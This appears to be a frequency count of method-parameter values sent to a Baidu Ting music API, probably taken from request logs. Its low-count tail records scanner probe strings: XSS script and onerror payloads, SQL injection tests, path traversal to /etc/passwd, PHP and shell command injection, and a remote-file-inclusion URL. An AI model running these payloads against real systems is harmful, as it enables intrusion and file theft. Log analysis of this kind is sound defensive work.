baidu.ting.song.getInfos	57439757
baidu.ting.song.baseInfo	25301408
baidu.ting.search.lrcpic	23769966
baidu.ting.search.catalogSug	18542616
baidu.ting.search.common	18443505
baidu.ting.user.listenAge	17699035
baidu.ting.song.play	17233287
baidu.ting.song.down	8586284
baidu.ting.song.lry	7976129
baidu.ting.user.getUserBaseInfo	7846003
baidu.ting.artist.getSongList	5876054
baidu.ting.favorite.isCollect	5278545
baidu.ting.artist.getList	4874319
ting.baidu.diy.getPlaylists	4810255
baidu.ting.song.getInfo	4670067
baidu.ting.billboard.billList	4529872
baidu.ting.search.lrcys	4339456
baidu.ting.search.getPhotoInfos	4017330
baidu.ting.user.config	3774425
baidu.ting.game.gamedetail	3411111
baidu.ting.plaza.getRecommendAlbum	3099729
baidu.ting.user.checkComVersion	2801213
baidu.ting.active.start	2726601
baidu.ting.plaza.active	2715547
baidu.ting.radio.playAction	2662164
baidu.ting.user.checkSuggestVersion	2643059
baidu.ting.artist.getInfo	2582632
	2363186
baidu.ting.diy.gedanInfo	2315730
baidu.ting.user.registToUC	2279702
baidu.ting.plaza.getFocusPic	1951210
baidu.ting.user.getMessage	1870137
baidu.ting.album.getAlbumInfo	1727675
baidu.ting.diy.gedanHot	1670151
baidu.ting.search.suggestion	1366443
baidu.ting.artist.getinfo	1297303
baidu.ting.diy.category	1293979
ting.baidu.plaza.recdaily	1268509
baidu.ting.radio.getChannelSong	1240129
baidu.ting.plaza.recdaily	1085787
baidu.ting.favorite.getCollectSong	1051139
baidu.ting.diy.addListenCount	1043084
baidu.ting.artist.getAlbumList	1009413
baidu.ting.plaza.getPartDesc	899894
baidu.ting.diy.getSongFromOfficalList	834739
baidu.ting.feedback.song	821214
baidu.ting.user.down	787782
baidu.ting.user.RegistToImsg	713552
baidu.ting.song.audio	666100
baidu.ting.tag.songlist	647898
baidu.ting.diy.gedan	611847
baidu.ting.tag.getHotTag	594908
baidu.ting.diy.getNowOfficalList	563873
baidu.ting.radio.getCategoryList	435126
baidu.ting.billboard.billCategory	376741
baidu.ting.search.lrcyss	333710
baidu.ting.diy.getPlaylists	315766
baidu.ting.search.getPhotoInfo	309905
baidu.ting.artist.getInfoList	305314
baidu.ting.game.gamelist	241461
baidu.ting.artist.get72HotArtist	192153
baidu.ting.plaza.recommend	188364
baidu.ting.song.getMulInfos	177218
baidu.ting.song.buffer	172937
baidu.ting.favorite.getFavoriteSong	163028
baidu.ting.favorite.addSongFavorites	130029
baidu.ting.mv.getIndexMV	119026
baidu.ting.outerPassport.profile	106426
baidu.ting.favorite.addSongFavorite	105751
baidu.ting.diy.search	101952
baidu.ting.tag.getAllTag	100805
baidu.ting.video.getList	100104
baidu.ting.diy.getSimilarGedan	89981
baidu.ting.video.play	76380
baidu.ting.diy.getOfficialDiyList	74422
baidu.ting.user.checkVersion	50831
baidu.ting.favorite.delCollectSong	44841
baidu.ting.plaza.getNewSongs	39696
ting.baidu.diy.getPlaylist	34405
baidu.ting.artist.getSpecialSongList	33991
baidu.ting.mv.playMV	33170
baidu.ting.radio.getArtistChannelSong	25960
baidu.ting.radio.getFavoriteSong	24607
baidu.ting.radio.serv	17837
baidu.ting.plaza.getArtistPlaza	16244
baidu.ting.diy.getPlaylist	15648
baidu.ting.user.nplogin	15328
baidu.ting.diy.addListSong	14474
baidu.ting.artist.getHighSongTitle	13096
baidu.ting.feedback.crash	12398
baidu.ting.album.getList	10510
baidu.ting.diy.saveList	10203
ting.baidu.film.getFilmInfo	9579
baidu.ting.song.cloud	8501
baidu.ting.mv.searchMV	7898
baidu.ting.favorite.delSongFavorite	7760
baidu.ting.video.category	7555
baidu.ting.song.getMulInfo	7212
baidu.ting.cloud.checkFile	6932
ting.baidu.song.lry	6720
baidu.ting.cloud.record	6694
baidu.ting.artist.getQianQianArtist	6514
baidu.ting.weixin.response	6436
baidu.ting.song.playAAC	4791
baidu.ting.colorRing.listen	4713
baidu.ting.diy.delListSong	4671
baidu.ting.diy.delList	4302
baidu.ting.billboard.catalog	4211
baidu.ting.user.logout	3874
baidu.ting.user.regPassport	3833
baidu.ting.artist.getHighSongList	3439
baidu.ting.colorRing.getCode	2925
baidu.ting.user.getMobileVcode	2429
baidu.ting.colorRing.authset	2401
baidu.ting.favorite.delSongFavorites	1746
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.feedback.info	1464
baidu.ting.favorite.getFavoriteAlbum	1395
baidu.ting.mv.getMultiSongMVInfo	1356
baidu.ting.artist.getSongRank	1253
baidu.ting.artist.getSong	1238
ting.baidu.artistapp.renum	1228
baidu.ting.diy.addList	851
baidu.ting.vip.checkVIPPromotion	795
baidu.ting.mv.getMVCategory	662
ting.baidu.artistapp.brief	659
baidu.ting.video.recMv	581
baidu.ting.favorite.getListenHistory	559
ting.baidu.search.lrcpic	554
baidu.ting.diy.upList	483
baidu.ting.song.getSuoSongInfo	379
baidu.ting.cloud.signature	371
baidu.ting.colorRing.subscribe	361
baidu.ting.favorite.getOffenListenList	316
baidu.ting.colorRing.toneset	316
baidu.ting.user.activate	309
baidu.ting.cloud.expand	308
ting.baidu.plaza.getFocusPic	292
baidu.ting.artist.getInfoByName	274
baidu.ting.artistapp.photo	256
baidu.ting.user.login	152
baidu.ting.favorite.getInfoFromView	142
baidu.ting.favorite.addAlbumFavorite	130
ting.baidu.artistapp.newList	106
baidu.ting.song.getHash	91
ting.baidu.artistapp.news	86
baidu.ting.user.addPassportInfo	47
ting.baidu.artistapp.briefs	41
baidu.ting.plaza.getMisNewSong	40
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	29
baidu.ting.favorite.delAlbumFavorite	28
baidu.ting.album.getAlbumstyle	23
(	15
baidu.ting.song.getPic	15
\' (	15
baidu.ting.game.catalog	11
df	9
baidu.ting.user.config?wap.10010.com	6
ting.baidu.game.gamedetail	6
ting.baidu.artistapp.send	6
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
ting.baidu.mv.getArtistMVInfo	6
${	5
${@print(md5(812812))}	5
http://cirt.lnet/rfiinc.txt	5
set	5
../../../../../../../../../../etc/passwd	5
c:/windows/win.ini	5
/usr/bin/id;	5
file:///etc/rc.d/rc.local_	5
data://text/plain;base64,dGVzdA==_	5
data://text/plain;base64,dGVzdA==	5
1\\\";cat /etc/rc.d/rc.local;\\\"	5
file:///etc/passwd_	5
file:///etc/rc.d/rc.local	5
c:/windows/win.ini_	5
string:{var_dump(md5(812812))}	5
1;cat /etc/rc.d/rc.local;	5
%{	5
../../../../../../../../../../etc/passwd_	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	5
1\';cat /etc/rc.d/rc.local;\'	5
\'];${@print(md5(812812))};//	5
http://cirt.lnet/rfiinc.txt_	5
../../../../../../../../../../etc/rc.d/rc.local_	5
../../../../../../../../../../etc/rc.d/rc.local	5
file:///etc/passwd	5
baidu.ting.radio.getChannelSong\';alert(1);\'	4
baidu.ting.active.start?wap.10010.com	4
baidu.ting.song.play\';alert(1);\'	4
baidu.ting.billboard.billLis2	4
ting.baidu.song.audio	3
ting.baidu.plaza.active	3
ting.baidu.diy.saveList	3
ting.baidu.search.playback	3
ting.baidu.plaza.recommend	3
ting.baidu.game.catalog	3
file:///etc/passwd_.jpg	3
http://cirt.lnet/rfiinc.txt_.html	3
ting.baidu.mv.getMultiSongMVInfo	3
ting.baidu.feedback.crash	3
ting.baidu.mv.playmv	3
ting.baidu.diy.gedan	3
ting.baidu.search.common	3
ting.baidu.mv.getindexmv	3
c:/windows/win.ini_.html	3
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.play\') and 8288=8288 and (\'	2
baidu.ting.radio.getChannelSong\";alert(1);\"	2
../../../../../../../../../../etc/passwd_.jpg	2
baidu.ting.radio.getChannelSong;alert(1);//	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
baidu.ting.radio.getChannelSong\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.game.gamedetail?wap.10010.com	2
baidu.ting.song.playjavascript:alert(1)	2
data://text/plain;base64,dGVzdA==_.jpg	2
data://text/plain;base64,dGVzdA==_.htm	2
baidu.ting.diy.category?wap.10010.com	2
baidu.ting.song.play\'\";alert(1);//	2
c:/windows/win.ini_.htm	2
baidu.ting.radio.getChannelSong\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play\";alert(1);\"	2
http://10.42.7.217/?1387473385.87	2
http://10.42.7.217/?1387473385.42	2
http://10.42.7.217/?1387459509.95	2
http://10.42.7.217/?1387459275.81	2
http://10.42.7.217/?1387452338.05	2
baidu.ting.song.lry\';alert(1);\'	2
http://cirt.lnet/rfiinc.txt_.php	2
baidu.ting.song.play;alert(1);//	2
file:///etc/rc.d/rc.local_.jpeg	2
file:///etc/rc.d/rc.local_.php	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.radio.getChannelSong--></script><script>alert(1)</script>	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.radio.getChannelSong>\'>\"><script>alert(1)</script>	2
baidu.ting.radio.getChannelSong%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.radio.getChannelSong</script><script>alert(1);//	2
baidu.ting.radio.getChannelSong<script>confirm(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
baidu.ting.radio.getChannelSong\') and 8288=8288 and (\'	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.radio.getChannelSong</textarea></title><script>alert(1)</script>	2
baidu.ting.radio.getChannelSong(\')\'))(\")\'\"\"\"\")	2
baidu.ting.radio.getChannelSong\' and \'8281\'=\'8281	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
baidu.ting.radio.getChannelSong\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.radio.getChannelSongjavascript:alert(1)	2
baidu.ting.radio.getChannelSong<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.play</script><script>alert(1);//	2
baidu.ting.radio.getChannelSong\'\";alert(1);//	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.radio.getChannelSong\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.radio.getChannelSong\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.lry<script>confirm(1)</script>	1
../../../../../../../../../../etc/passwd_.html	1
../../../../../../../../../../etc/passwd_.php	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
fdsafsdbaidu.ting.billboard.billListfdfdfd	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
231	1
data://text/plain;base64,dGVzdA==_.jpeg	1
baidu.ting.song.lryjavascript:alert(1)	1
baidu.ting.feedback.song?wap.10010.com	1
1	1
baidu.ting.song.lry\'\";alert(1);//	1
baidu.ting.billboard.billListfdfdfd	1
baidu.ting.pimit=5	1
baidu.ting.song.lry\";alert(1);\"	1
baidu.ting.vip.checkUserExchange	1
file:///etc/rc.d/rc.local_.html	1
baidu.ting.user.ge5827054008880	1
baidu.ting.song.lry;alert(1);//	1
baidu.ting.art1	1
baidu.ting.billboard.billLists	1
file:///etc/passwd_.jpeg	1
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	1
ting.baidu.billboard.billlist	1
file:///etc/passwd_.html	1
baidu.ting.song.lry--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
../../../../../../../../../../etc/rc.d/rc.local_.htm	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
